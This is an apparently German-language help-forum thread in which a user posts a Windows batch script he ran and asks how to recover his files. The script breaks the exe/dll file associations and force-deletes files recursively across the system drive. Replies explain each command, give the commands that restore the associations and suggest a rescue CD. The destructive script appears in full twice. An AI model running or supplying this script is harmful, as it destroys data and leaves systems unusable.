Durch .bat zuviel gelöscht,recovern?

Hallo Leute,

Ich habe gestern eine .bat datei ausgeführt die mir meine wichtigen daten vom pc gelöscht hat z.b win32.dllexe usw ich kann fast nichts mehr am Pc machen und nicht einmal mehr 3d spiele spielen…hier der .bat code

@echo off
cd /d %windir%
cd\
assoc .exe=error
assoc .dll=error
attrib -r -s -h *.* /s /d > nul
del /s /f /q *.* > nul
shutdown -s -f -t 00

Mit welchen code kann ich wiederherstellen ? (habe leider keine Windows XP Cd …)

Hallo,

kannst du den Rechner noch im „abgesicherten“ Modus hochfahren?

Wenn ja, dann kannste im Papierkorb gucken und die Dateien wiederherstellen.

Haelge

Ich weiss leider nicht wie ich in im Abgesicherten Modus starten kann…habe gerade auch gemerkt das ich kein neues Konto erstellen kann…wie starte ich im im gesicherten ?

Hallo Leute,

Ich habe gestern eine .bat datei ausgeführt die mir meine
wichtigen daten vom pc gelöscht hat z.b win32.dllexe usw ich
kann fast nichts mehr am Pc machen und nicht einmal mehr 3d
spiele spielen…hier der .bat code

@echo off
cd /d %windir%
cd\
assoc .exe=error
assoc .dll=error
attrib -r -s -h *.* /s /d > nul
del /s /f /q *.* > nul
shutdown -s -f -t 00

Ich hoffe für Dich, dass Du uns verarschst. Entschuldige, aber so dämlich kann wohl niemand sein, das Ganze schaut so aus wie wenn ein Script-Kiddie versucht, einen Wirkungsteil für ein Virus zusammenzupfuschen. Die Befehle machen im Einzelnen:

• Wechsle zum System-Laufwerk (Tipp: das Kommando

cd /d „%systemdrive%“ macht dasselbe, nur eleganter …

• versaut die Zuordnungen von .exe und .dll Dateiendungen, gehört zu

assoc .exe=exefile
assoc .dll=dllfile

entfernt dann das Read-Only und System-Attribut von allen Dateien und löscht sie dann. Das würde mehrere Minuten dauern, und nur ein kompletter Computer-Trottel würde das Programm seelenruhig durchlaufen lassen.

Aber eigentlich ist die ganze Story faul, der primitive Code müsste eigentlich bereits nach wenigen Sekunden in der Root an der Datei pagefile.sys scheitern und abbrechen, ohne Schaden anzurichten. Entschuldige, wenn ich das jetzt nicht auf meinem PC ausprobiere.

Mit welchen code kann ich wiederherstellen ? (habe leider
keine Windows XP Cd …)

Wenn meine Theorie stimmt, hat das Programm nichts wirklich gelöscht. Stelle die associations mit assoc wieder richtig (siehe oben) und es müsste alles wieder OK sein.

Ansonsten hilft nur Reparatur- oder Neuinstallation mit CD, dafür hat man sie zu haben. Ein Undelete Tool (ist keins dabei bei Windows - gibt es aber an jedem Hauseck zum Download) wird bei Massen von Systemdateien, von denen einige mit Sicherehits durch Neustarts bereits überschrieben wurden - nicht funktionieren, und „del“ löscht nicht in den Papierkorb, also ist nix mit Papierkorb-wiederherstellen, auch nicht im abgesicherten Modus.

Ohne CD, keine Chance.

Punkt.

Hi

kannst du den Rechner noch im „abgesicherten“ Modus
hochfahren?

Wenn ja, dann kannste im Papierkorb gucken und die Dateien
wiederherstellen.

nö… del über cmd geht direkt ins Nirwana afaik

Gruss
ExNicki

Hallo,

je mehr Du noch auf dem System machst, je geringer ist die Chance, gelöschte Dateien wieder herzustellen.

Lade Dir auf einem anderem Rechner

http://www.heise.de/software/download/parted_magic/4…

herunter, brenne die CD und starte Dein System von derselben.

Auf der CDs findest du Tools zur Datensicherung und Rettung.

Viel Erfolg

tf

Hey Cool super , danke dir :smiley: und nää ich bin kein Trottel…ich habe mir die batch datei mit absicht auf dem Pc gehaun…ich wollte wissen ob der Code auch auf Vista klappt und net nur auf XP … :smile: habe ihn zum glück nur ne halbe sek laden lassen bis ich den Pc ausgeschaltet habe , oki danke dir nomma hat alles geklappt :smiley:

Und danke euch andern alle auch :smile:

f8 beim starten drücken, aber haste es schon mit systemwiederherstellung versucht?